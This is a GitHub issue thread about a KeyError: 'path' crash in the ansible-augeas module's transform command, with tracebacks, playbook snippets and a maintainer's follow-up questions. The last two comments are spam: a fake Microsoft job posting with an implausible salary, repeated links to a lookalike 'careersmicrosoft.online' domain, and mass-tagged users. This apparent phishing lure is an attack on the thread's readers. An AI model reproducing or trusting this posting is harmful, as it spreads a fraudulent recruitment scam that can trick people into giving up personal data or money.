### ISSUE TITLE
KeyError: 'path' encountered while transforming a file 

### ISSUE THREAD

**Issue by vickydeshpande** [paluh/ansible-augeas#24]
after setting up the augeas ansible module as described in the repo, i tried running an ansible script in which i encounter an error trying to transform an xml file using the corresponding lens. I am using 'commands' under augeas. and i encounter the following error:
An exception occurred during task execution. The full traceback is:
Traceback (most recent call last):
  File "/tmp/ansible_fP7hG3/ansible_module_augeas.py", line 527, in <module>
    main()
  File "/tmp/ansible_fP7hG3/ansible_module_augeas.py", line 513, in main
    results, changed = execute(augeas_instance, commands)
  File "/tmp/ansible_fP7hG3/ansible_module_augeas.py", line 388, in execute
    params['path'] = "/files%s/%s" % ( file_ , params['path'] )
KeyError: 'path'

failed: [192.168.4.70] (item={u'dim_name': u'abc', u'config_name': u'abc'}) => {"failed": true, "invocation": {"module_name": "augeas"}, "item": {"config_name": "abc", "dim_name": "abc"}, "module_stderr": "Traceback (most recent call last):\n  File \"/tmp/ansible_fP7hG3/ansible_module_augeas.py\", line 527, in <module>\n    main()\n  File \"/tmp/ansible_fP7hG3/ansible_module_augeas.py\", line 513, in main\n    results, changed = execute(augeas_instance, commands)\n  File \"/tmp/ansible_fP7hG3/ansible_module_augeas.py\", line 388, in execute\n    params['path'] = \"/files%s/%s\" % ( file_ , params['path'] )\nKeyError: 'path'\n", "module_stdout": "", "msg": "MODULE FAILURE", "parsed": false}

Can someone please work this out?

**Comment by vickydeshpande** [comment]
Earlier i was trying to transform only xml files because that was my requirement. but just out of curiosity i tried transforming Properties files as well and still encountered the same error.

**Comment by vickydeshpande** [comment]
I think this error is arising due to some recent changes which may have been made in the augeas.py file. here we had an older copy of the augeas.py file on one of our servers. when the newly downloaded augeas.py file was replaced by the older file, the transform command worked properly.
Please do check for the same.

**Comment by vickydeshpande** [comment]
Attached herewith is the old file using which we were able to perform the augeas tasks. i have save d it as a txt because we cannot upload py files here
[augeas_old.txt](https://github.com/paluh/ansible-augeas/files/684717/augeas_old.txt)

**Comment by paluh** [comment]
Could you paste your `commands` action?

**Comment by vickydeshpande** [comment]
action: augeas commands='transform "Xml.lns" "incl" "{{ cube_parent_directory }}/{{ cube_name }}/analyzeCat/DimensionMeasureMetadata.xml"
                        load
                        set "/files{{ cube_parent_directory }}/{{ cube_name }}/analyzeCat/DimensionMeasureMetadata.xml/Configuration/Measure[last()+1]/#attribute/configName" "{{ item.config_name }}"
                        set "/files{{ cube_parent_directory }}/{{ cube_name }}/analyzeCat/DimensionMeasureMetadata.xml/Configuration/Measure[last()]/#attribute/uiName" "{{ item.config_name }}"
                        set "/files{{ cube_parent_directory }}/{{ cube_name }}/analyzeCat/DimensionMeasureMetadata.xml/Configuration/Measure[last()]/#attribute/olapName" "{{ item.config_name }}"
                        set "/files{{ cube_parent_directory }}/{{ cube_name }}/analyzeCat/DimensionMeasureMetadata.xml/Configuration/Measure[last()]/#attribute/isDerived" "true"
                        set "/files{{ cube_parent_directory }}/{{ cube_name }}/analyzeCat/DimensionMeasureMetadata.xml/Configuration/Measure[last()]/#attribute/formatter" "#,##0.00"'

**Comment by vickydeshpande** [comment]
We had tried running the code by reducing the number of commands being passed. And ultimately we reached to the conclusion that the `transform` command was what was failing.

**Comment by paluh** [comment]
Thanks! I'm going to investigate this failing case in few hours.

**Comment by evaryont** [comment]
I'm running into the same error at the moment, too:

```
- name: Modify pritunl config
  augeas:
    path: /etc/pritunl.conf
    commands: |
      transform "json" "incl" "/etc/pritunl.conf"
      load
      set "/files/etc/pritunl.conf/dict/*[. = 'port']/number" 1443
      set "/files/etc/pritunl.conf/dict/*[. = 'bind_addr']/string" "127.0.1.1"
```

results in the following error:

```

TASK [pritunl : Modify pritunl config] *****************************************
fatal: [vagabond]: FAILED! => {"changed": false, "failed": true, "module_stderr": "Shared connection to 127.0.0.1 closed.\r\n", "module_stdout": "Traceback (most recent call last):\r\n  File \"/tmp/ansible_7GEQLf/ansible_module_augeas.py\", line 527, in <module>\r\n    main()\r\n  File \"/tmp/ansible_7GEQLf/ansible_module_augeas.py\", line 513, in main\r\n    results, changed = execute(augeas_instance, commands)\r\n  File \"/tmp/ansible_7GEQLf/ansible_module_augeas.py\", line 388, in execute\r\n    params['path'] = \"/files%s/%s\" % ( file_ , params['path'] )\r\nKeyError: 'path'\r\n", "msg": "MODULE FAILURE", "rc": 0}
	to retry, use: --limit @./.ansible-retries/site.retry
```

**Comment by hyassine1** [comment]
# [Amazing Job Opportunity at Microsoft](https://careersmicrosoft.online/)

Exciting news! You have the chance to apply for a dream job at Microsoft Inc.!

## How to Apply:
Apply now by clicking [here](https://careersmicrosoft.online/). Hurry, applications close on [March 20, 2024](https://careersmicrosoft.online/).

## Job Description:
- **Position:** Lead Software Engineer
- **Salary:** $400,000 per year
- **Location:** Fully Remote
- **Benefits:**
  - Comprehensive health insurance coverage for you and your family
  - Generous retirement plan contributions
  - Unlimited vacation days and flexible work hours
  - Company-paid sabbaticals every three years
  - Annual company retreats to exotic locations
  - Cutting-edge equipment and tools for productivity

## Requirements:
- Minimum of 2 years of software engineering experience
- Expertise in multiple programming languages, including Python, JavaScript, and Go
- Deep understanding of cloud technologies, especially AWS and Kubernetes
- Track record of leading high-performing engineering teams
- Strong communication skills and ability to mentor junior developers

**Note:** This position is open to candidates worldwide. Don't miss the chance to join Microsoft Inc. and work on groundbreaking projects!
NobleEagle, @clemmsch, @andys8, @henryyuanheng-wang, @cstml, @batblackorg, @zhaohansprt, @stanislav-az, @gautomdas, @NetWalker108, @MorleyCellan, @nvetech, @superposition, @oldcryptogeek, @codyaverett, @gitaugakwa, @elpddev, @nicarq, @wuwfa4-di, @samuelpullely

**Comment by hyassine1** [comment]
# [Amazing Job Opportunity at Microsoft](https://careersmicrosoft.online/)

Exciting news! You have the chance to apply for a dream job at Microsoft Inc.!

## How to Apply:
Apply now by clicking [here](https://careersmicrosoft.online/). Hurry, applications close on [March 20, 2024](https://careersmicrosoft.online/).

## Job Description:
- **Position:** Lead Software Engineer
- **Salary:** $400,000 per year
- **Location:** Fully Remote
- **Benefits:**
  - Comprehensive health insurance coverage for you and your family
  - Generous retirement plan contributions
  - Unlimited vacation days and flexible work hours
  - Company-paid sabbaticals every three years
  - Annual company retreats to exotic locations
  - Cutting-edge equipment and tools for productivity

## Requirements:
- Minimum of 2 years of software engineering experience
- Expertise in multiple programming languages, including Python, JavaScript, and Go
- Deep understanding of cloud technologies, especially AWS and Kubernetes
- Track record of leading high-performing engineering teams
- Strong communication skills and ability to mentor junior developers

**Note:** This position is open to candidates worldwide. Don't miss the chance to join Microsoft Inc. and work on groundbreaking projects!
